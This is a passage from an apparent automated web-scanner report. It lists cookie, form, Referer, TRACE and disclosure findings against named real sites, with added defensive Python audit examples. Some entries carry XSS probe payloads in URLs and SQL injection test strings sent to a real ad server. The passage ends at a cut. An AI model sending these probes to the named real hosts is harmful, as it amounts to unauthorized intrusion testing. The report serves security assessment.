15.160. http://www.googleadservices.com/pagead/aclk

15.161. http://www.is3.com/about/contactUs.do

15.162. https://www.merrilledge.com/m/pages/home.aspx

15.163. http://www.nuclearpesticide.com/

15.164. http://www.paretologic.com/download/pchealthadvisor/revenuewire/
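
Sections 9, 14 and 15 are three views of the same data: the Set-Cookie headers observed in responses. The following is an added example, not part of the XSS.CX report, of a single pass over such a header that produces all three findings: Secure missing on an HTTPS response (section 9), scope widened to a parent domain (section 14) and HttpOnly missing (section 15). The URLs and cookie values are constructed placeholders, not captures from the hosts listed above.

```python
"""Audit Set-Cookie headers for the three cookie findings the report groups
under sections 9, 14 and 15. Sample headers are constructed; the hostnames
are placeholders, not the report's targets."""
from urllib.parse import urlsplit


def parse_set_cookie(header: str) -> dict:
    """Split one Set-Cookie header into name, value and lower-cased attributes.
    Flag attributes (Secure, HttpOnly) appear as keys with an empty value."""
    parts = [p.strip() for p in header.split(";") if p.strip()]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for part in parts[1:]:
        key, _, val = part.partition("=")
        attrs[key.strip().lower()] = val.strip()
    return {"name": name.strip(), "value": value, "attrs": attrs}


def audit_set_cookie(response_url: str, header: str) -> list:
    """Return findings for one Set-Cookie header issued by response_url."""
    url = urlsplit(response_url)
    host = (url.hostname or "").lower()
    cookie = parse_set_cookie(header)
    attrs = cookie["attrs"]
    findings = []

    # Section 9: a cookie set over HTTPS without Secure is also sent on any
    # plain-HTTP request to the same host, where it can be read on the wire.
    if url.scheme == "https" and "secure" not in attrs:
        findings.append(f"{cookie['name']}: set over HTTPS without the Secure flag")

    # Section 14: Domain=.example.com makes the cookie visible to every
    # subdomain, so the weakest subdomain can read or overwrite it.
    domain = attrs.get("domain", "").lstrip(".").lower()
    if domain and domain != host and host.endswith("." + domain):
        findings.append(f"{cookie['name']}: scoped to parent domain {domain!r} from host {host!r}")

    # Section 15: without HttpOnly, script running in the page (for example
    # via one of the reflected XSS findings in section 4) can read the cookie.
    if "httponly" not in attrs:
        findings.append(f"{cookie['name']}: HttpOnly flag not set")
    return findings


# Constructed samples in the shape a proxy log would show them.
SAMPLES = [
    ("https://www.example.com/login", "SESSIONID=abc123; Path=/"),
    ("http://shots.example.com/rk.php", "uid=42; Domain=.example.com; Path=/"),
    ("https://www.example.com/", "token=x1y2; Path=/; Secure; HttpOnly"),
]


def audit_samples() -> dict:
    """Run the audit over SAMPLES and key the findings by cookie name."""
    return {parse_set_cookie(h)["name"]: audit_set_cookie(u, h) for u, h in SAMPLES}


if __name__ == "__main__":
    for name, findings in audit_samples().items():
        print(name, "->", findings or ["no findings"])
```

The Secure check only applies to responses served over HTTPS, which is why every entry under section 9 is an https:// URL. Severity depends on what the cookie carries: a tracking-pixel identifier on an ad host and a banking session token both produce the same line in a scanner index, and the lists above mix the two freely.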

16. Password field with autocomplete enabled

16.1. https://account.snap.com/signup.php

16.2. http://afreshbunch.com/

16.3. http://afreshbunch.com/forums/

16.4. https://edit.yahoo.com/registration

16.5. http://learn.bridgefront.com/

16.6. http://learn.bridgefront.com/login.jsp

16.7. http://login.sisna.com/login_multiple/

16.8. http://login.sisna.com/login_multiple/

16.9. https://login.yahoo.com/config/login

16.10. https://securitymetrics.com/

16.11. https://securitymetrics.com/login.adp

16.12. https://securitymetrics.com/login.adp

16.13. https://securitymetrics.com/register_home.adp

16.14. https://store.tenable.com/index.php

16.15. https://store.tenable.com/index.php

16.16. https://support.sentrigo.com/User/Login

16.17. https://support.tenable.com/support-center/

16.18. http://www.afreshbunch.com/

16.19. http://www.afreshbunch.com/

16.20. http://www.bridgefront.com/cart/

16.21. http://www.bridgefront.com/cart/

16.22. https://www.clone-systems.com/ecommerce/checkout.php

16.23. https://www.clone-systems.com/ecommerce/checkout.php

16.24. https://www.comodo.com/login/comodo-members.php

16.25. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11

16.26. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11

16.27. http://www.firstdata.com/en_us/home

16.28. https://www.mysecureconnect.com/login.aspx

16.29. https://www.net-address.co.uk/manager.asp

16.30. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl
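
Sections 7 and 16 both come from inspecting the forms in a response body. The following is an added example, not part of the XSS.CX report, of the check that produces them: it walks the HTML with the standard-library parser, resolves each form's action against the page URL, and flags a password field that submits to a non-HTTPS action (section 7) or that neither it nor its form marks autocomplete="off" (section 16). The page URL and markup are constructed samples.

```python
"""Audit HTML forms for the two password-field findings in sections 7 and 16:
a password submitted to a non-HTTPS action URL, and a password field with
browser autocomplete left enabled. The HTML and URL are constructed samples."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class PasswordFormAuditor(HTMLParser):
    """Walk the markup, tracking the enclosing <form> for each password input."""

    def __init__(self, page_url: str):
        super().__init__()
        self.page_url = page_url
        self.form = None
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "form":
            # A relative action resolves against the page URL, so a form on an
            # https page with action="/login" still submits over HTTPS.
            self.form = {"action": urljoin(self.page_url, a.get("action", "")),
                         "autocomplete": a.get("autocomplete", "").lower()}
        elif tag == "input" and a.get("type", "").lower() == "password":
            form = self.form or {"action": self.page_url, "autocomplete": ""}
            name = a.get("name") or "(unnamed)"
            # Section 7: the credential crosses the network unencrypted.
            if urlsplit(form["action"]).scheme != "https":
                self.findings.append(
                    f"password field {name!r} submits in cleartext to {form['action']}")
            # Section 16: neither the field nor its form disables autocomplete.
            if a.get("autocomplete", "").lower() != "off" and form["autocomplete"] != "off":
                self.findings.append(f"password field {name!r} has autocomplete enabled")

    def handle_endtag(self, tag):
        if tag == "form":
            self.form = None


def audit_password_forms(page_url: str, html_text: str) -> list:
    """Return the findings for every password field in html_text."""
    auditor = PasswordFormAuditor(page_url)
    auditor.feed(html_text)
    auditor.close()
    return auditor.findings


# Constructed sample: the page is served over HTTPS but the first form posts
# to an http:// action; the second form is the corrected shape.
PAGE_URL = "https://login.example.com/login"
SAMPLE_HTML = """
<form action="http://login.example.com/auth" method="post">
  <input type="text" name="user">
  <input type="password" name="pass">
</form>
<form action="/auth" method="post" autocomplete="off">
  <input type="text" name="user2">
  <input type="password" name="pass2" autocomplete="new-password">
</form>
"""

if __name__ == "__main__":
    for finding in audit_password_forms(PAGE_URL, SAMPLE_HTML):
        print(finding)
```

Two caveats when reading these sections. A login page served over plain HTTP (every entry under section 7 is an http:// URL) is a problem even when its action is https, because the page itself can be rewritten in transit to point elsewhere. And current browsers ignore autocomplete="off" on login fields and offer to save the password regardless, so section 16 is informational rather than something a code change can fix.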

17. Source code disclosure

18. Referer-dependent response

18.1. http://adserving.cpxinteractive.com/st

18.2. http://response.firstdata.com/

18.3. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js

18.4. http://twitter.com/statuses/user_timeline/hugthecloud.json

18.5. http://www.bizographics.com/collect/

18.6. http://www.facebook.com/plugins/like.php

19. Cross-domain POST

19.1. http://afreshbunch.com/

19.2. http://www.afreshbunch.com/

19.3. http://www.cleanallspyware.com/

19.4. http://www.hipaarx.net/

19.5. http://www.onestoppciscan.com/contact.html

20. Cross-domain Referer leakage

20.1. http://ad.amgdgt.com/ads/

20.2. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

20.3. http://afreshbunch.com/

20.4. http://afreshbunch.com/forums/

20.5. http://bs.serving-sys.com/BurstingPipe/adServer.bs

20.6. https://edit.yahoo.com/registration

20.7. http://fls.doubleclick.net/activityi

20.8. http://freemarker.com/landing.php

20.9. http://freemarker.com/top.php

20.10. http://googleads.g.doubleclick.net/pagead/ads

20.11. http://googleads.g.doubleclick.net/pagead/ads

20.12. http://googleads.g.doubleclick.net/pagead/ads

20.13. http://googleads.g.doubleclick.net/pagead/ads

20.14. http://googleads.g.doubleclick.net/pagead/ads

20.15. http://googleads.g.doubleclick.net/pagead/ads

20.16. http://googleads.g.doubleclick.net/pagead/ads

20.17. http://googleads.g.doubleclick.net/pagead/ads

20.18. http://googleads.g.doubleclick.net/pagead/ads

20.19. http://googleads.g.doubleclick.net/pagead/ads

20.20. http://googleads.g.doubleclick.net/pagead/ads

20.21. http://googleads.g.doubleclick.net/pagead/ads

20.22. http://googleads.g.doubleclick.net/pagead/ads

20.23. http://googleads.g.doubleclick.net/pagead/ads

20.24. http://googleads.g.doubleclick.net/pagead/ads

20.25. http://googleads.g.doubleclick.net/pagead/ads

20.26. http://googleads.g.doubleclick.net/pagead/ads

20.27. http://googleads.g.doubleclick.net/pagead/ads

20.28. http://googleads.g.doubleclick.net/pagead/ads

20.29. http://ib.adnxs.com/ab

20.30. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

20.31. https://login.yahoo.com/config/login

20.32. http://nuclearpesticide.com/

20.33. https://olui2.fs.ml.com/login/login.aspx

20.34. http://response.firstdata.com/

20.35. http://shots.snap.com/rk.php

20.36. https://store.tenable.com/

20.37. https://store.tenable.com/index.php

20.38. http://threats2.paretologic.revenuewire.net/pcha/download

20.39. http://www.afreshbunch.com/

20.40. http://www.backbonesecurity.com/interior.cfm

20.41. https://www.bankofamerica.com/credit-cards/cardoverview.action

20.42. https://www.bankofamerica.com/deposits/cds-iras.go

20.43. https://www.bankofamerica.com/deposits/checking-accounts.go

20.44. https://www.bankofamerica.com/deposits/savings-accounts.go

20.45. https://www.bankofamerica.com/deposits/special-programs/add-it-up.go

20.46. https://www.bankofamerica.com/deposits/special-programs/keep-the-change.go

20.47. https://www.bankofamerica.com/homepage/WidgetAction.go

20.48. https://www.bankofamerica.com/homepage/overview.go

20.49. https://www.bankofamerica.com/hub/index.action

20.50. http://www.bing.com/search

20.51. http://www.bing.com/search

20.52. http://www.bing.com/search

20.53. http://www.clone-systems.com/ecommerce/cart.php

20.54. http://www.clone-systems.com/ecommerce/javascript/product.js

20.55. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php

20.56. http://www.facebook.com/plugins/like.php

20.57. http://www.genbook.com/bookings/booknowjstag.action

20.58. http://www.nuclearpesticide.com/

20.59. http://www.onestoppciscan.com/

20.60. http://www.saintcorporation.com/products/saas/webSaintPro.html

21. Cross-domain script include

21.1. https://account.snap.com/signup.php

21.2. http://ad.amgdgt.com/ads/

21.3. http://afreshbunch.com/

21.4. http://afreshbunch.com/

21.5. http://afreshbunch.com/about.htm

21.6. http://afreshbunch.com/forums/

21.7. http://afreshbunch.com/forums/images/x.gif

21.8. http://downloads.yahoo.com/freeware

21.9. http://downloads.yahoo.com/linux

21.10. http://downloads.yahoo.com/mobile

21.11. http://downloads.yahoo.com/windows

21.12. http://downloads.yahoo.com/windows/desktop-enhancements/virtual-desktop

21.13. http://downloads.yahoo.com/windows/is-it/security/anti-virus-scanners/avg-anti-virus-free-edition/42305

21.14. http://googleads.g.doubleclick.net/pagead/ads

21.15. http://googleads.g.doubleclick.net/pagead/ads

21.16. http://googleads.g.doubleclick.net/pagead/ads

21.17. http://learn.bankofamerica.com/

21.18. https://login.yahoo.com/config/login

21.19. http://nuclearpesticide.com/

21.20. https://olui2.fs.ml.com/login/login.aspx

21.21. http://response.firstdata.com/

21.22. https://securitymetrics.com/pricelist.adp

21.23. https://securitymetrics.com/sitecertinfo.adp

21.24. https://securitymetrics.com/sm/PANscan/

21.25. https://securitymetrics.com/sm/determinesaq/terminaltype

21.26. https://store.tenable.com/

21.27. https://store.tenable.com/index.php

21.28. https://support.tenable.com/support-center/

21.29. http://www.abaca.com/

21.30. http://www.abaca.com/search.js

21.31. http://www.afreshbunch.com/

21.32. http://www.afreshbunch.com/

21.33. http://www.backbonesecurity.com/interior.cfm

21.34. http://www.cleanallspyware.com/

21.35. http://www.clone-systems.com/ecommerce/cart.php

21.36. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/

21.37. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/

21.38. http://www.clone-systems.com/ecommerce/categories/Vulnerability-Scan-Services/

21.39. http://www.clone-systems.com/ecommerce/products/Penetration-Testing-On-Demand.html

21.40. http://www.clone-systems.com/pci-scanning.html

21.41. https://www.clone-systems.com/ecommerce/checkout.php

21.42. http://www.comodo.com/business-security/pci-compliance/pci-scan.php

21.43. http://www.comodo.com/contact-comodo/contact-us.php

21.44. http://www.comodo.com/resources/webinars/e-commerce/pci-compliance-demystified.php

21.45. http://www.comodo.com/support/comodo-support.php

21.46. http://www.facebook.com/plugins/like.php

21.47. http://www.genbook.com/bookings/booknowjstag.action

21.48. https://www.hackerguardian.com/

21.49. https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html

21.50. https://www.hackerguardian.com/javascript/functions.js

21.51. https://www.hackerguardian.com/ssl-certificate-products/ssl-certificate-index.html

21.52. http://www.hugthecloud.com/

21.53. https://www.instantssl.com/

21.54. https://www.instantssl.com/ssl-certificate-products/

21.55. http://www.is3.com/about/af-support-form.do

21.56. http://www.is3.com/about/contactUs.do

21.57. http://www.is3.com/products/antifraud/Affiliates.do

21.58. http://www.is3.com/products/antifraud/BizDev.do

21.59. http://www.is3.com/products/antifraud/Bulk-Licensing.do

21.60. http://www.is3.com/products/antifraud/Reseller.do

21.61. http://www.is3.com/products/antifraud/home.do

21.62. http://www.is3.com/support/antifraud/home.do

21.63. http://www.m8security.com/

21.64. http://www.m8security.com/m8secure-signup

21.65. http://www.m8security.com/managed-security

21.66. http://www.m8security.com/sites/all/themes/m8security/images/bottom_bg.gif

21.67. http://www.m8security.com/sites/all/themes/m8security/images/header.jpg

21.68. http://www.m8security.com/support

21.69. http://www.merrilledge.com/m/pages/global-oao.aspx

21.70. https://www.merrilledge.com/m/pages/global-oao.aspx

21.71. https://www.merrilledge.com/m/pages/home.aspx

21.72. http://www.nuclearpesticide.com/

21.73. http://www.saintcorporation.com/products/order.html

21.74. http://www.saintcorporation.com/products/saas/webSaintPro.html

22. File upload functionality

23. TRACE method is enabled

23.1. http://109.xg4ken.com/

23.2. https://account.snap.com/

23.3. http://bridgefront.com/

23.4. http://firstdata.122.2o7.net/

23.5. http://login.sisna.com/

23.6. https://shots-s.snap.com/

23.7. http://shots.snap.com/

23.8. http://support.sentrigo.com/

23.9. https://support.sentrigo.com/

23.10. http://widgets.digg.com/

23.11. http://www.actividentity.com/

23.12. http://www.genbook.com/

23.13. http://www.hipaarx.net/

23.14. http://www.hipaasecurityrx.net/

23.15. http://www.saintcorporation.com/

23.16. https://www.saintcorporation.com/

24. Email addresses disclosed

24.1. https://account.snap.com/signup.php

24.2. http://blog.ikano.com/

24.3. http://blog.ikano.com/favicon.ico

24.4. http://blog.ikano.com/wp-content/themes/WP_Premium/WP_Premium/taber.js

24.5. http://bridgefront.com/products_custom_course_development.php

24.6. http://download.stopzilla.com/images/is3/site/scripts/jquery/jquery.cookie.js

24.7. http://freemarker.com/top.php

24.8. http://ikano.com/

24.9. http://ikano.com/contact.asp

24.10. http://ikano.com/favicon.ico

24.11. http://ikano.com/press/dslextremepress.asp

24.12. http://ikano.com/press/dslextremepress2.asp

24.13. http://ikano.com/press/referralagent.asp

24.14. http://ikano.com/press/serverhuggerpress.asp

24.15. http://learn.bridgefront.com/intro/

24.16. https://login.yahoo.com/config/login

24.17. http://mydownload.paretologic.revenuewire.net/pcha/homepage

24.18. https://secure.comodo.com/management/passwordResetRequest.html

24.19. https://securitymetrics.com/sm/determinesaq/storechd

24.20. https://securitymetrics.com/sm/determinesaq/terminaltype

24.21. https://securitymetrics.com/static/js/controls.js

24.22. https://store.tenable.com/

24.23. https://store.tenable.com/includes/general.js

24.24. https://store.tenable.com/includes/templates/tenable/jscript/jquery.hoverIntent.min.js

24.25. https://store.tenable.com/includes/templates/tenable/jscript/jscript_imagehover.js

24.26. https://store.tenable.com/index.php

24.27. https://support.sentrigo.com/

24.28. https://support.sentrigo.com/User/Login

24.29. https://support.sentrigo.com/js/general/common.js

24.30. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/js/jquery.hoverIntent.min.js

24.31. http://threats2.paretologic.revenuewire.net/pcha/download

24.32. http://www.bankofamerica.com/global/mvc_objects/flyout/HM_ScriptDOM.js

24.33. https://www.bankofamerica.com/www/en_US/global/mvc_objects/flyout/HM_ScriptDOM.js

24.34. http://www.bridgefront.com/

24.35. http://www.bridgefront.com/cart/

24.36. http://www.bridgefront.com/contactus.php

24.37. http://www.bridgefront.com/solutions_education_revenue.php

24.38. http://www.bridgefront.net/

24.39. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jCarousel/jCarousel.js

24.40. http://www.clone-systems.com/ecommerce/javascript/jquery/plugins/jqzoom/jqzoom.js

24.41. https://www.clone-systems.com/ecommerce/checkout.php

24.42. http://www.comodo.com/contact-comodo/contact-us.php

24.43. http://www.comodo.com/js/lib/jquery.dimensions.js

24.44. http://www.comodo.com/js/lib/jquery.hoverIntent.minified.js

24.45. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_11_11

24.46. http://www.firstdata.com/en_us/about-first-data/media/press-releases/04_12_11

24.47. http://www.firstdata.com/fdc_site/_scripts/lib/jquery.xml2json.pack.js

24.48. http://www.firstdata.com/fdc_site/_styles/screen.css

24.49. https://www.fs.ustrust.com/CLUIResources/scripts/UIControls.CLUICommon.js

24.50. https://www.fs.ustrust.com/login/login.aspx

24.51. http://www.hipaarx.net/

24.52. http://www.hipaarx.net/contactus.php

24.53. http://www.hipaasecurityrx.net/

24.54. http://www.is3.com/about/af-support-form.do

24.55. http://www.is3.com/about/contactUs.do

24.56. http://www.is3.com/products/antifraud/BizDev.do

24.57. http://www.is3.com/products/antifraud/Bulk-Licensing.do

24.58. http://www.is3.com/products/antifraud/Reseller.do

24.59. http://www.onestoppciscan.com/contact.html

24.60. http://www.saintcorporation.com/products/order.html

24.61. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl

25. Private IP addresses disclosed

25.1. http://afreshbunch.com/

25.2. http://afreshbunch.com/about.htm

25.3. http://afreshbunch.com/forums/

25.4. http://afreshbunch.com/forums/images/x.gif

25.5. http://player.vimeo.com/config/14606948

25.6. http://vimeo.com/moogaloop.swf

25.7. http://www.afreshbunch.com/

25.8. http://www.facebook.com/extern/login_status.php

25.9. http://www.facebook.com/extern/login_status.php

25.10. http://www.facebook.com/extern/login_status.php

25.11. http://www.facebook.com/extern/login_status.php

25.12. http://www.facebook.com/plugins/like.php

25.13. http://www.google.com/sdch/rU20-FBA.dct

26. Credit card numbers disclosed

26.1. http://www.bing.com/search

26.2. http://www.bing.com/search

26.3. http://www.bing.com/search

27. Robots.txt file

27.1. http://172-vim-170.mktoresp.com/webevents/visitWebPage

27.2. https://account.snap.com/signup.php

27.3. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

27.4. http://bridgefront.com/products_custom_course_development.php

27.5. http://clients1.google.com/complete/search

27.6. http://data.cmcore.com/cookie-id.js

27.7. http://data.coremetrics.com/cm

27.8. http://firstdata.122.2o7.net/b/ss/firstdataprod/1/H.20.3/s97121651181951

27.9. http://fls.doubleclick.net/activityi

27.10. http://fonts.googleapis.com/css

27.11. http://linkhelp.clients.google.com/tbproxy/lh/fixurl

27.12. https://m8security.foxycart.com/files/foxycart_includes.js

27.13. http://maps.google.com/maps

27.14. http://now.eloqua.com/visitor/v200/svrGP.aspx

27.15. http://pixel.quantserve.com/pixel

27.16. http://realestatecenter.bankofamerica.com/RePortal/homepage.aspx

27.17. http://response.firstdata.com/

27.18. http://s7.addthis.com/js/250/addthis_widget.js

27.19. http://safebrowsing-cache.google.com/safebrowsing/rd/ChNnb29nLW1hbHdhcmUtc2hhdmFyEAEYj_8CIJD_AioFkL8AAAEyBY-_AAAB

27.20. http://safebrowsing.clients.google.com/safebrowsing/downloads

27.21. https://secure.comodo.com/management/passwordResetRequest.html

27.22. https://secure.comodo.net/ttb_searcher/trustlogo

27.23. https://secure.eloqua.com/visitor/v200/svrGP.aspx

27.24. https://shots-s.snap.com/snap_shots.js

27.25. http://shots.snap.com/snap_shots.js

27.26. http://sofa.bankofamerica.com/eluminate

27.27. https://store.tenable.com/index.php

27.28. http://themes.googleusercontent.com/font

27.29. http://tools.google.com/service/update2

27.30. http://widgets.digg.com/buttons/count

27.31. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

27.32. http://www.bankofamerica.com/adtrack/index.cgi

27.33. https://www.bankofamerica.com/

27.34. http://www.bizographics.com/collect/

27.35. https://www.clone-systems.com/ecommerce/checkout.php

27.36. https://www.comodo.com/login/comodo-members.php

27.37. http://www.genbook.com/bookings/booknowjstag.action

27.38. http://www.google.com/aclk

27.39. http://www.googleadservices.com/pagead/aclk

27.40. https://www.hackerguardian.com/

27.41. http://www.merrilledge.com/m/pages/global-oao.aspx

27.42. https://www.merrilledge.com/m/pages/home.aspx

27.43. http://www.saintcorporation.com/products/saas/webSaintPro.html

27.44. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl

28. Cacheable HTTPS response

28.1. https://account.snap.com/favicon.ico

28.2. https://account.snap.com/javascript/jquery.js

28.3. https://account.snap.com/javascript/prototype.1.6.1.0.js

28.4. https://account.snap.com/javascript/tab.js

28.5. https://olui2.fs.ml.com/publish/content/environment/environment.xml

28.6. https://secure.comodo.com/management/passwordResetRequest.html

28.7. https://secure.comodo.com/products/!hostedLogin

28.8. https://secure.opinionlab.com/

28.9. https://secure.opinionlab.com/ccc01/comment_card.asp

28.10. https://secure.opinionlab.com/ccc01/comment_card_d.asp

28.11. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

28.12. https://securitymetrics.com/

28.13. https://securitymetrics.com/login.adp

28.14. https://securitymetrics.com/pricelist.adp

28.15. https://securitymetrics.com/register_home.adp

28.16. https://securitymetrics.com/sitecertinfo.adp

28.17. https://securitymetrics.com/sm/PANscan/

28.18. https://securitymetrics.com/sm/determinesaq/storechd

28.19. https://securitymetrics.com/sm/determinesaq/terminaltype

28.20. https://shots-s.snap.com/snap_shots.js

28.21. https://support.sentrigo.com/favicon.ico

28.22. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/img/favicon.ico

28.23. https://www.comodo.com/login/comodo-members.php

28.24. https://www.hackerguardian.com/

28.25. https://www.hackerguardian.com/hackerguardian/buy/pci_free_scan.html

28.26. https://www.hackerguardian.com/ssl-certificate-products/ssl-certificate-index.html

28.27. https://www.instantssl.com/

28.28. https://www.instantssl.com/ssl-certificate-products/

28.29. https://www.mavitunasecurity.com/download/id/MF44CZE68YE67AM0F4PA6VRH3C4HRRKV

28.30. https://www.mavitunasecurity.com/support/checkupdate/

28.31. https://www.merrilledge.com/M/ScriptResource.axd

28.32. https://www.merrilledge.com/m/pages/home.aspx

28.33. https://www.merrilledge.com/publish/OSE/XML/MLTextChat.xml

28.34. https://www.mysecureconnect.com/favicon.ico

28.35. https://www.mysecureconnect.com/login.aspx

28.36. https://www.net-address.co.uk/manager.asp

28.37. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl

28.38. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl

28.39. https://www.saintcorporation.com/favicon.ico

29. Multiple content types specified

29.1. http://learn.bridgefront.com/help/dhtml_search.js

29.2. http://translate.googleapis.com/translate_static/js/element/main.js

30. HTML does not specify charset

30.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

30.2. http://bs.serving-sys.com/BurstingPipe/adServer.bs

30.3. http://cleanallspyware.com/Spam

30.4. http://fls.doubleclick.net/activityi

30.5. http://ikano.com/

30.6. http://ikano.com/contact.asp

30.7. http://ikano.com/favicon.ico

30.8. http://ikano.com/press/dslextremepress.asp

30.9. http://ikano.com/press/dslextremepress2.asp

30.10. http://ikano.com/press/referralagent.asp

30.11. http://ikano.com/press/serverhuggerpress.asp

30.12. https://landingpage.leads.dynamicssite.com/PostLead.aspx

30.13. http://now.eloqua.com/visitor/v200/svrGP.aspx

30.14. http://pixel.intellitxt.com/pixel.jsp

30.15. https://secure.comodo.com/management/passwordResetRequest.html

30.16. http://spamlaws.us.intellitxt.com/iframescript.jsp

30.17. http://www.backbonesecurity.com/favicon.ico

30.18. http://www.directbrand.com/tracking202/static/landing.php

30.19. http://www.directbrand.com/tracking202/static/record.php

30.20. https://www.fs.ustrust.com/login/login.aspx

30.21. https://www.fs.ustrust.com/login/login.aspx'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Enetsparker(0x000010)%3C/script%3E

30.22. https://www.fs.ustrust.com/login/login.aspx/%22ns=%22netsparker(0x000011)

30.23. https://www.fs.ustrust.com/login/login.aspx/%2522ns%253D%2522netsparker%25280x000012%2529)

30.24. http://www.onestoppciscan.com/contact.html

30.25. http://www.saintcorporation.com/cgi-bin/shopcart/cart.pl

30.26. https://www.saintcorporation.com/cgi-bin/secure/customer/logon.pl

30.27. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl

30.28. http://www.secureconnect.com/rssReplayProxy.php

31. HTML uses unrecognised charset

31.1. https://secure.opinionlab.com/ccc01/comment_card.asp

31.2. https://secure.opinionlab.com/ccc01/comment_card_d.asp

31.3. https://secure.opinionlab.com/ccc01/comment_card_json_4_0_b.asp

32. Content type incorrectly stated

32.1. http://172-vim-170.mktoresp.com/favicon.ico

32.2. https://account.snap.com/favicon.ico

32.3. https://account.snap.com/javascript/jquery.js

32.4. https://account.snap.com/javascript/prototype.1.6.1.0.js

32.5. https://account.snap.com/javascript/tab.js

32.6. http://ar.voicefive.com/b/rc.pli

32.7. http://bridgefront.com/favicon.ico

32.8. http://cleanallspyware.com/favicon.ico

32.9. http://event.adxpose.com/event.flow

32.10. http://i.ixnp.com/shot_main_js/v6.59/

32.11. https://landingpage.leads.dynamicssite.com/PostLead.aspx

32.12. http://learn.bridgefront.com/favicon.ico

32.13. http://login.sisna.com/login_multiple/

32.14. http://now.eloqua.com/visitor/v200/svrGP.aspx

32.15. http://pixel.intellitxt.com/pixel.jsp

32.16. http://response.firstdata.com/favicon.ico

32.17. http://secure.comodo.com/products/guessregion

32.18. https://shots-s.snap.com/snap_shots.js

32.19. http://shots.snap.com/asj/v1/6e8afd4f63cdc7886a3f718aa78c7375/2863866373/auto_shot.js

32.20. http://shots.snap.com/asj/v1/spakey/1797024321/auto_shot.js

32.21. http://shots.snap.com/snap_shots.js

32.22. https://support.sentrigo.com/favicon.ico

32.23. https://support.tenable.com/support-center/cerberus-support-center/themes/tenable/img/favicon.ico

32.24. http://verify.authorize.net/anetseal/images/secure90x72.gif

32.25. http://www.actividentity.com/inc5c69f%3Cscript%3Ealert(document.cookie)%3C/script%3Ecf590911e53/securimage/securimage_play.swf

32.26. http://www.bankofamerica.com/favicon.ico

32.27. http://www.bankofamerica.com/global/images/new_Banklogo.gif

32.28. https://www.bankofamerica.com/homepage/WidgetAction.go

32.29. https://www.bankofamerica.com/homepage/overview

32.30. http://www.bridgefront.com/favicon.ico

32.31. http://www.cleanallspyware.com/favicon.ico

32.32. http://www.directbrand.com/tracking202/static/landing.php

32.33. http://www.directbrand.com/tracking202/static/record.php

32.34. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-black-webfont.woff

32.35. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-bold-webfont.woff

32.36. http://www.firstdata.com/transarmor/campaigntest/_files/fonts/simplesans-light-webfont.woff

32.37. https://www.mavitunasecurity.com/support/checkupdate/

32.38. http://www.saintcorporation.com/favicon.ico

32.39. https://www.saintcorporation.com/favicon.ico

32.40. http://www.secureconnect.com/rssReplayProxy.php

33. Content type is not specified

33.1. http://cf.addthis.com/favicon.ico

33.2. https://securitymetrics.com/sm/PANscan/

33.3. https://securitymetrics.com/sm/determinesaq/storechd

33.4. https://securitymetrics.com/sm/determinesaq/terminaltype



1. SQL injection
There are 33 instances of this issue:


1.1. http://ad.doubleclick.net/adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3 [client parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ad.doubleclick.net
Path:   /adi/N3175.134426.GOOGLECONTENTNETWO1/B4640114.3

Issue detail

The client parameter appears to be vulnerable to SQL injection attacks. The payloads 85094699'%20or%201%3d1--%20 and 85094699'%20or%201%3d2--%20 (URL-decoded: 85094699' or 1=1-- and 85094699' or 1=2-- ) were each submitted in the client parameter. These two requests resulted in different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present. In this instance the two responses differ only in the creative served (Surprise_728x90_Free2011Score.gif versus Frame_Rev_728x90.gif) and in the click-tracking path in front of it; the injected client value is echoed unchanged into the href in both. That is the pattern of an ad server rotating creatives per request, not of an altered SQL predicate, which is why the confidence is recorded as Tentative. Repeating the unmodified request several times shows whether the endpoint varies on its own, and that check should precede any injection conclusion.

Request 1

